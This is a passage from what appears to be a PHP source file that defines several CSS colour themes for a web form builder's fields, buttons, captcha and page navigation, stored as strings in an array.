!important;\nbackground-color:#84857D !important;\nborder: 1px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 15px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 1px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 15px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 1px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 15px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 1px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 15px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\npadding: 0 4px;\nmargin:0 0 3px;\r\nborder-radius:4px;\r\nborder:0px;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FFFFFF;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#F06E00;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FFFFFF;\r\nmargin-right:3px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #FFFFFF;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #FFFFFF;\r\nborder-radius:4px !important;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\nborder-radius:4px;\r\nborder:1px solid #FFFFFF;\r\nmargin:5px 7px;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "3" => ".wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n.wdform_table1 button\n{\n	background-image:none !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:left;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important; \n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#F06E00 !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:19px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder:0px !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:0px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:0px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #ffffff !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#ffffff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:#F06E00 !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#58B8EA !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#F06E00 !important;\nborder-radius:11px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:0px !important;\nbackground-color:#58B8EA !important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#58B8EA !important;\nborder: 0px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#58B8EA !important;\nborder: 0px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder: 0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#58B8EA !important;\nborder: 0px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#58B8EA !important;\nborder: 0px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:5px solid white !important;\nborder-radius:7px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\npadding: 0 4px;\nmargin:0 0 3px;\r\nborder-radius:4px;\r\nborder: 0px;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder:1px solid #FFFFFF;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\nborder:1px solid #FFFFFF;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FFFFFF;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#702400;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FFFFFF;\r\nmargin-right:3px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #FFFFFF;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #FFFFFF;\r\nborder-radius:4px;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\nborder-radius:4px;\r\nborder:1px solid #FFFFFF;\r\nmargin:5px 7px;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "4" => ".wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:left;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important; \n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#702400 !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:19px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder:0px !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:0px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:0px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #ffffff !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#ffffff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:#702400 !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#702400 !important;\nborder-radius:11px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:0px !important;\nbackground-color:#000 !important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 11px !important;\nfont-weight: bold !important;\nborder-radius:7px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 11px !important;\nfont-weight: bold !important;\nborder-radius:7px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder: 0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 7px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 11px !important;\nfont-weight: bold !important;\nborder-radius: 7px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size:11px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:5px solid white !important;\nborder-radius:7px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\npadding: 0 4px;\nmargin:0 0 3px;\r\nborder-radius:4px;\r\nborder:1px solid #000000;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder:1px solid #000000;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder:1px solid #000000;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #000000;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FED69B;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #000000;\r\nmargin-right:3px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #000000;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder-radius:4px !important;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\nborder-radius:4px;\r\nborder:1px solid #000000;\r\nmargin:5px 7px;\r\npadding:1px;\r\n}\r\n",
      "5" => ".wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:left;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important; \n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#FED69B !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:21px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:17px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder:1px solid #000 !important;\nborder-radius:4px !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.wdform_colon\n{\ncolor:#000 !important;\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000 !important;\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nheight:17px !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif 